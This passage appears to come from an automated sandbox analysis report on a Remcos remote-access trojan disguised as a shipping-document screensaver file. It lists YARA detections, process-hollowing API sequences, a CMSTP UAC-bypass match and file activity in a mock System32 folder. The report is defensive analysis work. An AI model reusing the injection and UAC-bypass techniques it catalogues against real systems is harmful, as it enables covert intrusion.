Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,	0_2_028B81B8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC7B4 NtCreateFile,NtWriteFile,	0_2_028BC7B4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC724 NtDeleteFile,	0_2_028BC724
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7A94 NtWriteVirtualMemory,	0_2_028B7A94
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BDA24 NtQueryInformationProcess,	0_2_028BDA24
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC898 NtOpenFile,NtReadFile,	0_2_028BC898
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BD9A4 NtQueryInformationProcess,	0_2_028BD9A4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7944 NtAllocateVirtualMemory,	0_2_028B7944
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B81B6 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,	0_2_028B81B6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC6AC NtDeleteFile,	0_2_028BC6AC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BC7B2 NtCreateFile,NtWriteFile,	0_2_028BC7B2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7A92 NtWriteVirtualMemory,	0_2_028B7A92
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7942 NtAllocateVirtualMemory,	0_2_028B7942
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279580EF CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	0_2_279580EF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	0_2_2795D58F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795BB09 OpenProcess,NtSuspendProcess,CloseHandle,	0_2_2795BB09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795BB35 OpenProcess,NtResumeProcess,CloseHandle,	0_2_2795BB35
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	0_2_279532D2
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	5_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	5_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8898C NtQueryInformationToken,	5_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	5_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	5_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	5_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	5_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	6_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	6_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8898C NtQueryInformationToken,	6_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	6_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	6_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	6_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	6_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	6_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	9_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	9_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8898C NtQueryInformationToken,	9_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	9_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	9_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	9_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	9_2_00007FF70CC888C0
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A39890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,	16_2_00007FF7E0A39890
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	31_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	31_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8898C NtQueryInformationToken,	31_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	31_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	31_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	31_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	31_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,FindCloseChangeNotification,NtSetInformationFile,DeleteFileW,GetLastError,	32_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	32_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	32_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	32_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8898C NtQueryInformationToken,	32_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	32_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	32_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	32_2_00007FF70CC888C0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC889E4 NtQueryInformationToken,NtQueryInformationToken,	34_2_00007FF70CC889E4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	34_2_00007FF70CC73D94
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8898C NtQueryInformationToken,	34_2_00007FF70CC8898C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CCA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	34_2_00007FF70CC87FF8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	34_2_00007FF70CC9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	34_2_00007FF70CC88114
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	34_2_00007FF70CC888C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,	36_2_0040DD85
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00401806 NtdllDefWindowProc_W,	36_2_00401806
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004018C0 NtdllDefWindowProc_W,	36_2_004018C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004016FD NtdllDefWindowProc_A,	37_2_004016FD
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004017B7 NtdllDefWindowProc_A,	37_2_004017B7

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.exe

Code function: 5_2_00007FF70CC75240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,

5_2_00007FF70CC75240

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread,

0_2_028B81B8

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

Creates files inside the system directory

Source: C:\Users\Public\alpha.exe	File created: C:\Windows	Jump to behavior
Source: C:\Users\Public\alpha.exe	File created: C:\Windows \System32	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Users\Public\alpha.exe

File deleted: C:\Windows \System32

Detected potential crypto function

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40117194	0_2_40117194
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_4010B5C1	0_2_4010B5C1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A20C4	0_2_028A20C4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27976FEA	0_2_27976FEA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797DE9D	0_2_2797DE9D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27975E5E	0_2_27975E5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E558	0_2_2797E558
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279774E6	0_2_279774E6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2799332B	0_2_2799332B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E2FB	0_2_2797E2FB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279861F0	0_2_279861F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27973946	0_2_27973946
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2797E0CC	0_2_2797E0CC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279778FE	0_2_279778FE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795DB62	0_2_2795DB62
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2796739D	0_2_2796739D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27967BAF	0_2_27967BAF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27966E0E	0_2_27966E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27967A46	0_2_27967A46
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040E800	1_2_0040E800
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040C838	1_2_0040C838
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040F1CA	1_2_0040F1CA
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_00411250	1_2_00411250
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004102D0	1_2_004102D0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_0040B2E7	1_2_0040B2E7
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004102F0	1_2_004102F0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004105F0	1_2_004105F0
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_00410673	1_2_00410673
Source: C:\Users\Public\Libraries\glrkszlG.pif	Code function: 1_2_004106B9	1_2_004106B9
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC77D30	5_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC85554	5_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7AA54	5_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC837D8	5_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7CE10	5_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC78DF8	5_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9D9D0	5_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC781D4	5_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CCA1538	5_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC76EE4	5_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97F00	5_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC80A6C	5_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9EE88	5_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7E680	5_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AA30	5_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC74A30	5_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC84224	5_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC72220	5_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7D250	5_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC79E50	5_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC77650	5_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC75240	5_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC76BE0	5_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73410	5_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC9AFBC	5_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC75B70	5_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC73F90	5_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7372C	5_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC79B50	5_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC7B0D8	5_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC78510	5_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC818D4	5_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71884	5_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC72C48	5_2_00007FF70CC72C48
